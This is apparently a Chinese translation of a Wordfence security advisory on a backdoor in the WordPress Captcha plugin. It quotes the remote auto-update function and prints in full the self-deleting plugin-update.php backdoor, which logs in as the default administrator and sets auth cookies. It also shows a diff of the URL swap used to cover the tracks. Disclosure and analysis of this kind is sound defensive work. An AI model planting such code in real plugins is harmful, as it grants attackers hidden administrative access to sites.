WordPress商店里面的Captcha插件后门影响超30万站点

popular-wordpress-plugin.png

WordPress存储库最近删除了插件Captcha,这个插件最初看起来是当前作者使用“WordPress”的商标问题 [编者提示:原始页面已被删除,我们现在链接到一个屏幕截图]。名称。

每当WordPress存储库删除一个大用户群的插件,我们检查是否可能是由于某些安全相关的。Wordfence提醒用户,当他们正在运行的任何插件也从WordPress的回购中删除。在被移除的时候,Captcha已经有超过30万次的主动安装,所以它的移除对许多用户有很大的影响。虽然开发者是发布关于插件删除原因的人,但我决定查看插件来源,看看开发者是否有一些犯规行为。我发现了下面的代码:

function cptch_wp_plugin_auto_update()
{
    require_once ('cptch_wp_auto_update.php');
    global $cptch_plugin_info;

    $wptuts_plugin_current_version = $cptch_plugin_info['Version'];
    $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_pro_update.php';
    $wptuts_plugin_slug = plugin_basename(__FILE__);

    new cptch_wp_auto_update($wptuts_plugin_current_version, $wptuts_plugin_remote_path, $wptuts_plugin_slug);
}

此代码触发一个自动更新过程,从一个ZIP文件下载https://simplywordpress[dot]net/captcha/captcha_pro_update.php,然后提取并安装Captcha在现场运行的插件的副本上。ZIP包含一些与插件库中的代码不同的小代码,它还包含一个叫做plugin-update.php后门的文件:

@unlink(__FILE__);

require('../../../wp-blog-header.php');
require('../../../wp-includes/pluggable.php');
$user_info = get_userdata(1);
// Automatic login //
$username = $user_info->user_login;
$user = get_user_by('login', $username );
// Redirect URL //
if ( !is_wp_error( $user ) )
{
    wp_clear_auth_cookie();
    wp_set_current_user ( $user->ID );
    wp_set_auth_cookie  ( $user->ID );

    $redirect_to = user_admin_url();
    wp_safe_redirect( $redirect_to );

    exit();
}

一个后门文件允许攻击者,或在这种情况下,插件作者,获得未经授权的管理访问您的网站。这个后门创建一个用户ID为1的会话(WordPress首次安装时创建的默认管理员用户),设置身份验证Cookie,然后删除自己。

后门安装代码是未经验证的,意味着任何人都可以触发它。我们将编辑这篇文章,在30天之后包含一个概念证明,并提供关于后门安装和执行的技术细节。

ZIP文件中的其他更改之一是使用开发人员用于安装后门的相同自动更新过程更新URL:

< $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_pro_update.php';
---
> $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_free_update.php';

从下拉的代码https://simplywordpress[net]net/captcha/captcha_free_update.php与插件存储库中的代码完全相同,因此触发相同的自动更新过程将删除后门的所有文件系统跟踪,使其看起来好像从不存在并帮助攻击者避免检测。

该插件首先在2017年12月4日下午1:52 UTC在提交@ 1780758将这个恶意代码包含在WordPress插件存储库中:

原文链接:https://www.wordfence.com/blog/2017/12/backdoor-captcha-plugin/

标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码